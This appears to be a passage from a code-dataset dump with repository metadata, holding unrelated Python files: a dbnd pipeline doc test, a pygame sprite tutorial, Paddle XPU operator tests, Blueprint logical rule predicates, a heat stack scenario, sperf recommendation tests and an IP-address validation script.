] | null | null | null | examples/src/dbnd_examples/tests/documentation/orchestration/task_pipeline/test_doc_tasks_pipeline_data.py | dmytrostriletskyi/dbnd | d4a5f5167523e80439c9d64182cdc87b40cbc48f | [
"Apache-2.0"
] | null | null | null | examples/src/dbnd_examples/tests/documentation/orchestration/task_pipeline/test_doc_tasks_pipeline_data.py | dmytrostriletskyi/dbnd | d4a5f5167523e80439c9d64182cdc87b40cbc48f | [
"Apache-2.0"
] | null | null | null | import pandas as pd
from pandas import DataFrame
from dbnd import pipeline, task
from dbnd_examples.data import data_repo
class TestDocTasksPipelinesData:
def test_pipelines(self):
#### DOC START
@task
def prepare_data(data: pd.DataFrame) -> pd.DataFrame:
return data
@task
def train_model(data: pd.DataFrame) -> object:
...
@pipeline
def prepare_data_pipeline(data: pd.DataFrame):
prepared_data = prepare_data(data)
model = train_model(prepared_data)
return model
#### DOC END
prepare_data_pipeline.dbnd_run(data_repo.wines)
def test_data(self):
#### DOC START
@task
def prepare_data(data: DataFrame) -> DataFrame:
data["new_column"] = 5
return data
#### DOC END
prepare_data.dbnd_run(data=data_repo.wines)
| 24.236842 | 61 | 0.602606 |
2a419057ed32d0d72a2ab5830767804b84e6235c | 2,259 | py | Python | test.py | alexanderAustin/PythonGame | 9a3da340ffa426d3c6d59b5c2eb3f2a68792164f | [
"Apache-2.0"
] | null | null | null | test.py | alexanderAustin/PythonGame | 9a3da340ffa426d3c6d59b5c2eb3f2a68792164f | [
"Apache-2.0"
] | null | null | null | test.py | alexanderAustin/PythonGame | 9a3da340ffa426d3c6d59b5c2eb3f2a68792164f | [
"Apache-2.0"
] | null | null | null | # This was built from the tutorial https://www.raywenderlich.com/24252/beginning-game-programming-for-teens-with-python
import pygame, math, random
from pygame.locals import *
import pyganim
# 2 - Initialize the game
pygame.init()
width, height = 640, 480
screen=pygame.display.set_mode((width, height))
pygame.display.set_caption('PyGame - Testing')
rootImg = "resources/images/basic_game/"
rootAud = "resources/audio/basic_game/"
player = pygame.image.load(rootImg + "dude.png")
grass = pygame.image.load(rootImg + "grass.png")
castle = pygame.image.load(rootImg + "castle.png").convert_alpha()
# cow = pygame.image.load("resources/images/animals/cow/cow_front.png") #subject to change
# Used https://github.com/asweigart/pyganim/tree/master/examples
# http://www.pygame.org/project-Pyganim+sprite+animation+module-2106-.html
# for the sprite sheets
cows = pyganim.getImagesFromSpriteSheet(
filename="resources/images/animals/cow/cow_front.png",
rows=4, cols=2,
scale=2)
cframes = list(zip(cows, [100] * len(cows)))
cowObj = pyganim.PygAnimation(cframes)
cowObj.play()
cowsr = pyganim.getImagesFromSpriteSheet(
filename="resources/images/animals/cow/cow_rear.png",
rows=3, cols=3,
scale=2)
crframes = list(zip(cowsr, [100] * len(cowsr)))
# crframes = crframes.pop()#remove blank frame
print crframes
cowrObj = pyganim.PygAnimation(crframes)
cowrObj.play()
# 4 - keep looping through
running = 1
while running:
# 5 - clear the screen before drawing it again
screen.fill(0)
# 6 - draw the screen elements
for x in range(width/grass.get_width()+1):
for y in range(height/grass.get_height()+1):
screen.blit(grass,(x*100,y*100))
cowObj.blit(screen, (200, 20))
cowrObj.blit(screen, (50, 200))
# screen.blit(castle, (100,100))
# 7 - update the screen
pygame.display.flip()
# 8 - loop through the events
for event in pygame.event.get():
# check if the event is the X button
if event.type==pygame.QUIT:
# if it is quit the game
pygame.quit()
exit(0)
while 1:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
exit(0)
pygame.display.flip() | 30.945205 | 119 | 0.683046 |
b621cb59c0ed009598f40990176147fe3f91b518 | 4,522 | py | Python | python/paddle/fluid/tests/unittests/xpu/test_reduce_prod_op_xpu.py | Li-fAngyU/Paddle | e548f65f96697830035a28f9070b40829408ccdb | [
"Apache-2.0"
] | 8 | 2016-08-15T07:02:27.000Z | 2016-08-24T09:34:00.000Z | python/paddle/fluid/tests/unittests/xpu/test_reduce_prod_op_xpu.py | Li-fAngyU/Paddle | e548f65f96697830035a28f9070b40829408ccdb | [
"Apache-2.0"
] | 1 | 2022-01-28T07:23:22.000Z | 2022-01-28T07:23:22.000Z | python/paddle/fluid/tests/unittests/xpu/test_reduce_prod_op_xpu.py | Li-fAngyU/Paddle | e548f65f96697830035a28f9070b40829408ccdb | [
"Apache-2.0"
] | 1 | 2022-03-02T11:36:03.000Z | 2022-03-02T11:36:03.000Z | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
import sys
sys.path.append("..")
import paddle
from op_test import OpTest
from op_test_xpu import XPUOpTest
from xpu.get_test_cover_info import create_test_class, get_xpu_op_support_types, XPUOpTestWrapper
paddle.enable_static()
class XPUTestReduceProdOP(XPUOpTestWrapper):
def __init__(self):
self.op_name = 'reduce_prod'
self.use_dynamic_create_class = False
class TestXPUReduceProdOp(XPUOpTest):
def setUp(self):
self.place = paddle.XPUPlace(0)
self.init_dtype()
self.op_type = 'reduce_prod'
self.use_mkldnn = False
self.keep_dim = False
self.reduce_all = False
self.initTestCase()
self.attrs = {
'dim': self.axis,
'keep_dim': self.keep_dim,
'reduce_all': self.reduce_all
}
self.inputs = {'X': np.random.random(self.shape).astype(self.dtype)}
if self.attrs['reduce_all']:
self.outputs = {'Out': self.inputs['X'].prod()}
else:
self.outputs = {
'Out': self.inputs['X'].prod(
axis=self.axis, keepdims=self.attrs['keep_dim'])
}
def initTestCase(self):
self.shape = (5, 6, 10)
self.axis = (0, )
def init_dtype(self):
self.dtype = self.in_type
def test_check_output(self):
self.check_output_with_place(self.place)
def test_check_grad(self):
self.check_grad_with_place(self.place, ['X'], 'Out')
class TestProdOp5D(TestXPUReduceProdOp):
def initTestCase(self):
self.shape = (1, 2, 5, 6, 10)
self.axis = (0, )
class TestProdOp6D(TestXPUReduceProdOp):
def initTestCase(self):
self.shape = (1, 1, 2, 5, 6, 10)
self.axis = (0, )
class TestProdOp8D(TestXPUReduceProdOp):
def initTestCase(self):
self.shape = (1, 3, 1, 2, 1, 4, 3, 10)
self.axis = (0, 3)
class Test1DReduce(TestXPUReduceProdOp):
def initTestCase(self):
self.shape = 120
self.axis = (0, )
class Test2DReduce0(TestXPUReduceProdOp):
def initTestCase(self):
self.shape = (20, 10)
self.axis = (0, )
class Test2DReduce1(TestXPUReduceProdOp):
def initTestCase(self):
self.shape = (20, 10)
self.axis = (1, )
class Test3DReduce0(TestXPUReduceProdOp):
def initTestCase(self):
self.shape = (5, 6, 7)
self.axis = (1, )
class Test3DReduce1(TestXPUReduceProdOp):
def initTestCase(self):
self.shape = (5, 6, 7)
self.axis = (2, )
class Test3DReduce2(TestXPUReduceProdOp):
def initTestCase(self):
self.shape = (5, 6, 7)
self.axis = (-2, )
class Test3DReduce3(TestXPUReduceProdOp):
def initTestCase(self):
self.shape = (5, 6, 7)
self.axis = (1, 2)
class TestKeepDimReduce(TestXPUReduceProdOp):
def initTestCase(self):
self.shape = (5, 6, 10)
self.axis = (1, )
self.keep_dim = True
class TestKeepDim8DReduce(TestXPUReduceProdOp):
def initTestCase(self):
self.shape = (2, 5, 3, 2, 2, 3, 4, 2)
self.axis = (3, 4, 5)
self.keep_dim = True
class TestReduceAll(TestXPUReduceProdOp):
def initTestCase(self):
self.shape = (5, 6, 2, 10)
self.axis = (0, )
self.reduce_all = True
support_types = get_xpu_op_support_types('reduce_prod')
for stype in support_types:
create_test_class(globals(), XPUTestReduceProdOP, stype)
if __name__ == '__main__':
unittest.main()
| 30.761905 | 97 | 0.591331 |
caa406032938b7e25578bb3a27ddeba8b923fdb0 | 8,887 | py | Python | blueprint/py/bp/rules/logical.py | andrey-mishchenko/blueprint-oss | 3bad9258571a0e08c53a9a05061e8461a1e62567 | [
"MIT"
] | 7 | 2021-08-16T09:17:31.000Z | 2022-02-16T01:27:08.000Z | blueprint/py/bp/rules/logical.py | andrey-mishchenko/blueprint-oss | 3bad9258571a0e08c53a9a05061e8461a1e62567 | [
"MIT"
] | null | null | null | blueprint/py/bp/rules/logical.py | andrey-mishchenko/blueprint-oss | 3bad9258571a0e08c53a9a05061e8461a1e62567 | [
"MIT"
] | 1 | 2021-08-11T20:17:06.000Z | 2021-08-11T20:17:06.000Z | """Logic-related Blueprint rules."""
from dataclasses import dataclass, replace
from typing import Callable, Iterable, Optional, Tuple
from uuid import uuid4
from ..document import Document
from ..entity import Entity
from ..extraction import Field
from ..rule import AtomDegree, AtomScore, DegreeError, Predicate, RuleScore
from ..spatial_formula import (
Conjunction as LogicalConjunction,
Disjunction as LogicalDisjunction,
Formula,
simplify,
)
def _prod(xs: Iterable[float]) -> float:
answer = 1.0
for x in xs:
answer *= x
return answer
def _check_score_degree(entities: Tuple[Entity, ...],
degree: AtomDegree) -> None:
if degree != 'ANY' and len(entities) != degree:
raise DegreeError('scoring wrong number of entities; '
f'expected {degree}, got {len(entities)}')
def _check_phi_degree(fields: Tuple[Field, ...],
degree: AtomDegree) -> None:
if degree != 'ANY' and len(fields) != degree:
raise DegreeError('applying to wrong number of fields; '
f'expected {degree}, got {len(fields)}')
@dataclass(frozen=True)
class AllHold(Predicate):
wrapped_predicates: Tuple[Predicate, ...]
degree_: AtomDegree
def __init__(
self,
wrapped_predicates: Tuple[Predicate, ...],
degree_: AtomDegree,
name: str = 'penalize',
uuid: Optional[str] = None,
):
super().__init__(
name = name,
uuid = str(uuid4()) if uuid is None else uuid,
)
object.__setattr__(self, 'wrapped_predicates', wrapped_predicates)
object.__setattr__(self, 'degree_', degree_)
@property
def degree(self) -> AtomDegree:
return self.degree_
def score(self, entities: Tuple[Entity, ...], doc: Document) -> RuleScore:
_check_score_degree(entities, degree=self.degree)
results = tuple(predicate.score(entities, doc)
for predicate in self.wrapped_predicates)
score = _prod(result.score for result in results)
return AtomScore(score)
def phi(self, fields: Tuple[Field, ...]) -> Formula:
_check_phi_degree(fields, degree=self.degree)
return simplify(LogicalConjunction(
predicate.phi(fields) for predicate in self.wrapped_predicates))
def all_hold(*predicates: Predicate) -> Predicate:
"""Says that all of its subrules hold.
This is the analog of `and` in a normal programming language.
Technically, the resulting score is the product of the scores of the subrules.
"""
degrees = set(filter(
lambda degree: degree != 'ANY',
(predicate.degree for predicate in predicates)))
if len(degrees) > 1:
raise DegreeError('all input predicates to all_hold must have same degree; '
f'error in {predicates}')
degree = next(iter(degrees)) if degrees else 'ANY'
return AllHold(
name='all_hold({})'.format(', '.join(sorted(map(str, predicates)))),
wrapped_predicates=predicates,
degree_=degree)
@dataclass(frozen=True)
class AnyHolds(Predicate):
wrapped_predicates: Tuple[Predicate, ...]
degree_: AtomDegree
def __init__(
self,
wrapped_predicates: Tuple[Predicate, ...],
degree_: AtomDegree,
name: str = 'penalize',
uuid: Optional[str] = None,
):
super().__init__(
name = name,
uuid = str(uuid4()) if uuid is None else uuid,
)
object.__setattr__(self, 'wrapped_predicates', wrapped_predicates)
object.__setattr__(self, 'degree_', degree_)
@property
def degree(self) -> AtomDegree:
return self.degree_
def score(self, entities: Tuple[Entity, ...], doc: Document) -> RuleScore:
_check_score_degree(entities, degree=self.degree)
results = tuple(predicate.score(entities, doc)
for predicate in self.wrapped_predicates)
score = max(result.score for result in results)
return AtomScore(score)
def phi(self, fields: Tuple[Field, ...]) -> Formula:
_check_phi_degree(fields, degree=self.degree)
return simplify(LogicalDisjunction(
predicate.phi(fields) for predicate in self.wrapped_predicates))
def any_holds(*predicates: Predicate) -> Predicate:
"""Says that at least one of its subrules holds.
This is the analog of `or` in a normal programming langauge.
Technically, the score is the maximum of the scores of the subrules.
"""
degrees = set(
filter(
lambda degree: degree != 'ANY',
(predicate.degree for predicate in predicates)))
if len(degrees) > 1:
raise DegreeError(
f'all input rules must have same degree; error in {predicates}')
degree = next(iter(degrees)) if degrees else 'ANY'
return AnyHolds(
name='any_holds({})'.format(', '.join(sorted(map(str, predicates)))),
wrapped_predicates=predicates,
degree_=degree)
@dataclass(frozen=True)
class AreDisjoint(Predicate):
"""Says that two fields' assignments have no words in common.
Scores 0 if the two fields' assignments have any words in common, 1 otherwise.
NOTE: This doesn't check whether the same *string* appears in the two field
assignments: it checks whether the two field assignments *share any actual
typeset words on the page*.
"""
def __init__(
self,
name: str = 'are_disjoint',
uuid: Optional[str] = None,
):
super().__init__(
name = name,
uuid = str(uuid4()) if uuid is None else uuid,
)
@property
def degree(self) -> int:
return 2
def score(self, entities: Tuple[Entity, ...], doc: Document) -> RuleScore:
if len(entities) != 2:
raise DegreeError(f'wrong number of entities passed to {self}.score')
E1, E2 = entities
if not set(E1.entity_words()) & set(E2.entity_words()):
return AtomScore(1)
else:
return AtomScore(0)
are_disjoint = AreDisjoint()
@dataclass(frozen=True)
class Nop(Predicate):
"""No op. Will always score 1."""
def __init__(
self,
name: str = 'nop',
uuid: Optional[str] = None,
):
super().__init__(
name = name,
uuid = str(uuid4()) if uuid is None else uuid,
)
@property
def degree(self) -> AtomDegree:
return 'ANY'
def score(self, entities: Tuple[Entity, ...], doc: Document) -> RuleScore:
return AtomScore(1)
@dataclass(frozen=True)
class Penalize(Predicate):
wrapped_predicate: Predicate
max_score: float
def __init__(
self,
wrapped_predicate: Predicate,
max_score: float = 0.7,
name: str = 'penalize',
uuid: Optional[str] = None,
):
super().__init__(
name = name,
uuid = str(uuid4()) if uuid is None else uuid,
)
object.__setattr__(self, 'wrapped_predicate', wrapped_predicate)
object.__setattr__(self, 'max_score', max_score)
@property
def degree(self) -> AtomDegree:
return self.wrapped_predicate.degree
def score(self, entities: Tuple[Entity, ...], doc: Document) -> RuleScore:
result = self.wrapped_predicate.score(entities, doc)
# FIXME: Once we support this in Studio, add back in metadata for
# pre-penalize score (same for non-fatal below)
return AtomScore(min(result.score, self.max_score))
def phi(self, fields: Tuple[Field, ...]) -> Formula:
return self.wrapped_predicate.phi(fields)
def penalize(wrapped_predicate: Predicate, max_score: float = 0.7) \
-> Predicate:
return Penalize(wrapped_predicate, max_score)
@dataclass(frozen=True)
class NonFatal(Predicate):
wrapped_predicate: Predicate
min_score: float
def __init__(
self,
wrapped_predicate: Predicate,
min_score: float = 0.5,
name: str = 'non_fatal',
uuid: Optional[str] = None,
):
super().__init__(
name = name,
uuid = str(uuid4()) if uuid is None else uuid,
)
object.__setattr__(self, 'wrapped_predicate', wrapped_predicate)
object.__setattr__(self, 'min_score', min_score)
@property
def degree(self) -> AtomDegree:
return self.wrapped_predicate.degree
def score(self, entities: Tuple[Entity, ...], doc: Document) -> RuleScore:
result = self.wrapped_predicate.score(entities, doc)
return AtomScore(max(result.score, self.min_score))
def non_fatal(wrapped_predicate: Predicate, min_score: float = 0.5) \
-> Predicate:
return NonFatal(wrapped_predicate, min_score)
@dataclass(frozen=True)
class Negate(Predicate):
wrapped_predicate: Predicate
def __init__(
self,
wrapped_predicate: Predicate,
name: str = 'negate',
uuid: Optional[str] = None,
):
super().__init__(
name = name,
uuid = str(uuid4()) if uuid is None else uuid,
)
object.__setattr__(self, 'wrapped_predicate', wrapped_predicate)
@property
def degree(self) -> AtomDegree:
return self.wrapped_predicate.degree
def score(self, entities: Tuple[Entity, ...], doc: Document) -> RuleScore:
result = self.wrapped_predicate.score(entities, doc)
return replace(result, score=(1 - result.score))
def negate(wrapped_predicate: Predicate) -> Predicate:
return Negate(wrapped_predicate)
| 28.123418 | 80 | 0.68212 |
830d38317439ee3c1af0c103232e9e3b0a93b0d7 | 12,573 | py | Python | tests/test_recs.py | datastax-labs/sperf | 934248642c4ef6b5d944153fe45628a4bc3825fb | [
"Apache-2.0"
] | 12 | 2020-05-27T20:21:10.000Z | 2021-10-14T14:39:50.000Z | tests/test_recs.py | datastax-labs/sperf | 934248642c4ef6b5d944153fe45628a4bc3825fb | [
"Apache-2.0"
] | 43 | 2020-05-02T07:11:45.000Z | 2021-10-01T15:16:17.000Z | tests/test_recs.py | datastax-labs/sperf | 934248642c4ef6b5d944153fe45628a4bc3825fb | [
"Apache-2.0"
] | 11 | 2020-05-28T16:15:07.000Z | 2021-12-03T07:58:39.000Z | # Copyright 2020 DataStax, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""test the recs module"""
import unittest
import types
from pysper import recs
class TestRecs(unittest.TestCase):
"""recs testing"""
def test_high_pending_write_remote(self):
"""verify StageAnalyzer makes recs on high pending writes"""
analyzer = recs.Engine(None, None)
stage = recs.Stage(
name="TPC/all/WRITE_REMOTE",
pending=10001,
active=0,
local_backpressure=0,
completed=0,
blocked=0,
all_time_blocked=0,
)
reason, rec = analyzer.analyze_stage(stage)
self.assertEqual(rec, "lower memtable_cleanup_threshold in cassandra.yaml")
self.assertEqual(reason, "pending remote writes over 10000")
stage.pending = 9999
reason, rec = analyzer.analyze_stage(stage)
self.assertIsNone(rec)
self.assertIsNone(reason)
def test_high_pending_write_local(self):
"""verify StageAnalyzer makes recs on high pending local writes"""
analyzer = recs.Engine(None, None)
stage = recs.Stage(
name="TPC/all/WRITE_LOCAL",
pending=10001,
active=0,
local_backpressure=0,
completed=0,
blocked=0,
all_time_blocked=0,
)
reason, rec = analyzer.analyze_stage(stage)
self.assertEqual(rec, "lower memtable_cleanup_threshold in cassandra.yaml")
self.assertEqual(reason, "pending local writes over 10000")
stage.pending = 9999
reason, rec = analyzer.analyze_stage(stage)
self.assertIsNone(rec)
self.assertIsNone(reason)
def test_high_pending_mutations(self):
"""verify StageAnalyzer makes recs on high pending local writes"""
analyzer = recs.Engine(None, None)
stage = recs.Stage(
name="MutationStage",
pending=10001,
active=0,
local_backpressure=0,
completed=0,
blocked=0,
all_time_blocked=0,
)
reason, rec = analyzer.analyze_stage(stage)
self.assertEqual(rec, "lower memtable_cleanup_threshold in cassandra.yaml")
self.assertEqual(reason, "mutations pending over 10000")
stage.pending = 9999
reason, rec = analyzer.analyze_stage(stage)
self.assertIsNone(rec)
self.assertIsNone(reason)
def test_tpc_backpressure(self):
"""verify StageAnalyzer makes recs on any backpressure"""
analyzer = recs.Engine(None, None)
stage = recs.Stage(
name="TPC/2",
pending=1,
active=0,
local_backpressure=1,
completed=0,
blocked=0,
all_time_blocked=0,
)
reason, rec = analyzer.analyze_stage(stage)
self.assertEqual(
rec,
"raise or set tpc_concurrent_requests_limit in "
+ "cassandra.yaml (default is 128), if CPU is underutilized.",
)
self.assertEqual(reason, "local backpressure is present")
stage.pending = 0
stage.local_backpressure = 0
reason, rec = analyzer.analyze_stage(stage)
self.assertIsNone(rec)
self.assertIsNone(reason)
def test_full_memtable(self):
"""verify StageAnalyzer"""
analyzer = recs.Engine(None, None)
stage = recs.Stage(
name="TPC/all/WRITE_MEMTABLE_FULL",
pending=0,
active=1,
local_backpressure=0,
completed=0,
blocked=0,
all_time_blocked=0,
)
reason, rec = analyzer.analyze_stage(stage)
self.assertEqual(rec, "lower memtable_cleanup_threshold in cassandra.yaml")
self.assertEqual(reason, "full memtable")
stage.active = 0
reason, rec = analyzer.analyze_stage(stage)
self.assertIsNone(rec)
self.assertIsNone(reason)
def test_full_memtable_completed(self):
"""verify full memtable historically completed"""
analyzer = recs.Engine(None, None)
stage = recs.Stage(
name="TPC/all/WRITE_MEMTABLE_FULL",
pending=0,
active=0,
local_backpressure=0,
completed=1,
blocked=0,
all_time_blocked=0,
)
reason, rec = analyzer.analyze_stage(stage)
self.assertEqual(rec, "lower memtable_cleanup_threshold in cassandra.yaml")
self.assertEqual(
reason, "full memtable stages previously completed is too high"
)
stage.completed = 0
reason, rec = analyzer.analyze_stage(stage)
self.assertIsNone(rec)
self.assertIsNone(reason)
def test_compactions_behind(self):
"""verify compactions analysis"""
analyzer = recs.Engine(None, None)
stage = recs.Stage(
name="CompactionManger",
pending=101,
active=0,
local_backpressure=0,
completed=0,
blocked=0,
all_time_blocked=0,
)
reason, rec = analyzer.analyze_stage(stage)
self.assertEqual(rec, "raise compaction_throughput_in_mb in cassandra.yaml")
self.assertEqual(reason, "more than 100 compactions behind")
stage.pending = 0
reason, rec = analyzer.analyze_stage(stage)
self.assertIsNone(rec)
self.assertIsNone(reason)
def test_memtable_flush_writer_pending(self):
"""verify flush writer pending"""
analyzer = recs.Engine(None, None)
stage = recs.Stage(
name="MemtableFlushWriter",
pending=6,
active=0,
local_backpressure=0,
completed=0,
blocked=0,
all_time_blocked=0,
)
reason, rec = analyzer.analyze_stage(stage)
self.assertEqual(rec, "raise memtable_flush_writers in cassandra.yaml")
self.assertEqual(reason, "memtable flush writers pending over 5")
stage.pending = 0
reason, rec = analyzer.analyze_stage(stage)
self.assertIsNone(rec)
self.assertIsNone(reason)
def test_memtable_flush_writer_blocked(self):
"""verify flush writer blocked"""
analyzer = recs.Engine(None, None)
stage = recs.Stage(
name="MemtableFlushWriter",
pending=0,
active=0,
local_backpressure=0,
completed=0,
blocked=1,
all_time_blocked=0,
)
reason, rec = analyzer.analyze_stage(stage)
self.assertEqual(rec, "lower memtable_cleanup_threshold in cassandra.yaml")
self.assertEqual(reason, "memtable flush writers blocked greater than zero")
stage.blocked = 0
reason, rec = analyzer.analyze_stage(stage)
self.assertIsNone(rec)
self.assertIsNone(reason)
def test_ntr_blocked(self):
"""verify ntr blocked"""
analyzer = recs.Engine(None, "3.11.3")
stage = recs.Stage(
name="Native-Transport-Requests",
pending=0,
active=0,
local_backpressure=0,
completed=0,
blocked=11,
all_time_blocked=0,
)
reason, rec = analyzer.analyze_stage(stage)
self.assertEqual(
rec,
"raise or set -Dcassandra.max_queued_native_transport_requests= "
+ "(valid range is 1024-8192)",
)
self.assertEqual(reason, "blocked NTR over 10")
stage.blocked = 0
reason, rec = analyzer.analyze_stage(stage)
self.assertIsNone(rec)
self.assertIsNone(reason)
def test_ntr_all_time_blocked(self):
"""verify ntr blocked"""
analyzer = recs.Engine(None, "3.11.3")
stage = recs.Stage(
name="Native-Transport-Requests",
pending=0,
active=0,
local_backpressure=0,
completed=0,
blocked=0,
all_time_blocked=101,
)
reason, rec = analyzer.analyze_stage(stage)
self.assertEqual(
rec,
"raise or set -Dcassandra.max_queued_native_transport_requests= "
+ "(valid range is 1024-8192)",
)
self.assertEqual(reason, "more than 100 blocked NTR all time")
stage.all_time_blocked = 0
reason, rec = analyzer.analyze_stage(stage)
self.assertIsNone(rec)
self.assertIsNone(reason)
def test_filter_cache_analysis_frequent_evictions(self):
"""when filter cache eviction freq is sooner than ever 20 seconds recommend raising limits"""
stats = types.SimpleNamespace()
stats.avg_evict_freq = 19.9
stats.avg_evict_duration = 10
stats.last_evict_item_limit = 32000
stats.perc_item_limit = 0.95
reason, rec = recs.analyze_filter_cache_stats(stats)
self.assertEqual(reason, "Filter cache evictions are happening too frequently.")
self.assertEqual(
rec,
"Raise filter cache item limit from 32000 to 256000 via -Dsolr.solrfiltercache.maxSize.",
)
def test_filter_cache_analysis_long_duration_evictions(self):
"""when filter cache eviction duration is longer than 1 second recommend raising limits"""
stats = types.SimpleNamespace()
stats.avg_evict_freq = 60.0
stats.avg_evict_duration = 1001
stats.last_evict_item_limit = 256000
stats.perc_item_limit = 0.95
reason, rec = recs.analyze_filter_cache_stats(stats)
self.assertEqual(reason, "Filter cache eviction duration is too long.")
self.assertEqual(
rec,
"Lower filter cache item limit from 256000 to 32000 via -Dsolr.solrfiltercache.maxSize.",
)
def test_filter_cache_analysis_frequent_long_evictions(self):
"""when filter cache eviction duration is longer than 1 second recommend raising limits"""
stats = types.SimpleNamespace()
stats.avg_evict_freq = 10.0
stats.avg_evict_duration = 60001
stats.last_evict_item_limit = 256000
stats.perc_item_limit = 0.95
reason, rec = recs.analyze_filter_cache_stats(stats)
self.assertEqual(
reason,
"Filter cache evictions are happening too frequently and too slowly.",
)
self.assertEqual(
rec,
"Make more FQ queries uncached. "
+ 'Example: change "fq":"status:DELETED" to "fq":"{!cached=false}status:DELETED".',
)
def test_limit_eviction_limit_already_reached(self):
"""already as low as one can go"""
stats = types.SimpleNamespace()
stats.avg_evict_freq = 100.0
stats.avg_evict_duration = 1244.0
stats.last_evict_item_limit = 31000
stats.perc_item_limit = 0.95
reason, rec = recs.analyze_filter_cache_stats(stats)
self.assertEqual(
reason, "Filter cache eviction duration long but limit is already too low."
)
self.assertEqual(
rec,
"Make more FQ queries uncached. "
+ 'Example: change "fq":"status:DELETED" to "fq":"{!cached=false}status:DELETED".',
)
def test_filter_cache_analysis_zero_set(self):
"""when filter cache eviction duration is longer than 1 second recommend raising limits"""
stats = types.SimpleNamespace()
stats.avg_evict_freq = 0.0
stats.avg_evict_duration = 0.0
stats.perc_item_limit = 0.0
reason, rec = recs.analyze_filter_cache_stats(stats)
self.assertIsNone(rec)
self.assertIsNone(reason)
def test_filter_cache_analysis_none_set(self):
"""when filter cache eviction duration is longer than 1 second recommend raising limits"""
stats = types.SimpleNamespace()
reason, rec = recs.analyze_filter_cache_stats(stats)
self.assertIsNone(rec)
self.assertIsNone(reason)
| 37.198225 | 101 | 0.619502 |
13cd859d1acb8a6c02f5ae17b43725a486dc5bad | 1,058 | py | Python | exercicios_antigos/desafios/arquivos_endereco_ip.py | jfklima/prog_pratica | 72c795e3372e46f04ce0c92c05187aec651777cf | [
"MIT"
] | null | null | null | exercicios_antigos/desafios/arquivos_endereco_ip.py | jfklima/prog_pratica | 72c795e3372e46f04ce0c92c05187aec651777cf | [
"MIT"
] | null | null | null | exercicios_antigos/desafios/arquivos_endereco_ip.py | jfklima/prog_pratica | 72c795e3372e46f04ce0c92c05187aec651777cf | [
"MIT"
] | null | null | null | # arquivo de endereços ip
# arquivo de endereços ip validados
# enderecos de ip valido são aqueles que tem quatro números sepados por ponto e
# que cada número não pode ultrapassar o valor de 255 ou seja não pode ser
# maior que 255
def validar(ip):
numeros = ip.split('.')
if len(numeros) !=4:
return False
for n in numeros:
if not (0 <= int(n) <= 255):
return False
return True
ips_validos = []
ips_invalidos = []
with open("enderecos_ip.txt", 'r') as arquivo:
for linha in arquivo:
ip = linha.strip()
if validar(ip):
ips_validos.append(ip)
else:
ips_invalidos.append(ip)
with open("enderecos_ip_validado.txt", 'w') as arquivo:
arquivo.writelines('[Endereços válidos:]\n')
for ip_valido in ips_validos:
arquivo.writelines(f"{ip_valido}\n")
arquivo.writelines('\n')
arquivo.writelines('\n')
arquivo.writelines('[Endereços inválidos:]\n')
for ip_invalido in ips_invalidos:
arquivo.writelines(f"{ip_invalido}\n")
| 25.190476 | 79 | 0.642722 |
a969ba7c4229c588d38e01f66824780334ab253e | 1,639 | py | Python | heat/tests/convergence/scenarios/multiple_update.py | noironetworks/heat | 7cdadf1155f4d94cf8f967635b98e4012a7acfb7 | [
"Apache-2.0"
] | 265 | 2015-01-02T09:33:22.000Z | 2022-03-26T23:19:54.000Z | heat/tests/convergence/scenarios/multiple_update.py | noironetworks/heat | 7cdadf1155f4d94cf8f967635b98e4012a7acfb7 | [
"Apache-2.0"
] | 8 | 2015-09-01T15:43:19.000Z | 2021-12-14T05:18:23.000Z | heat/tests/convergence/scenarios/multiple_update.py | noironetworks/heat | 7cdadf1155f4d94cf8f967635b98e4012a7acfb7 | [
"Apache-2.0"
] | 295 | 2015-01-06T07:00:40.000Z | 2021-09-06T08:05:06.000Z | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
example_template = Template({
'A': RsrcDef({}, []),
'B': RsrcDef({}, []),
'C': RsrcDef({'a': '4alpha'}, ['A', 'B']),
'D': RsrcDef({'c': GetRes('C')}, []),
'E': RsrcDef({'ca': GetAtt('C', 'a')}, []),
})
engine.create_stack('foo', example_template)
engine.noop(5)
engine.call(verify, example_template)
example_template_shrunk = Template({
'A': RsrcDef({}, []),
'B': RsrcDef({}, []),
'C': RsrcDef({'a': '4alpha'}, ['A', 'B']),
'D': RsrcDef({'c': GetRes('C')}, []),
})
engine.update_stack('foo', example_template_shrunk)
engine.noop(10)
engine.call(verify, example_template_shrunk)
example_template_long = Template({
'A': RsrcDef({}, []),
'B': RsrcDef({}, []),
'C': RsrcDef({'a': '4alpha'}, ['A', 'B']),
'D': RsrcDef({'c': GetRes('C')}, []),
'E': RsrcDef({'ca': GetAtt('C', 'a')}, []),
'F': RsrcDef({}, ['D', 'E']),
})
engine.update_stack('foo', example_template_long)
engine.noop(12)
engine.call(verify, example_template_long)
engine.delete_stack('foo')
engine.noop(6)
engine.call(verify, Template({}))
| 32.137255 | 78 | 0.61928 |
788e12b31825b6459f6b7cca6f98ec7680998208 | 7,859 | py | Python | kbr/dbase/__init__.py | brugger/kbr-tools-dbase | 0704e14c48bde6a9233b649ec12992e99a8cac73 | [
"MIT"
] | 1 | 2021-02-02T09:47:40.000Z | 2021-02-02T09:47:40.000Z | kbr/dbase/__init__.py | brugger/kbr-tools-dbase | 0704e14c48bde6a9233b649ec12992e99a8cac73 | [
"MIT"
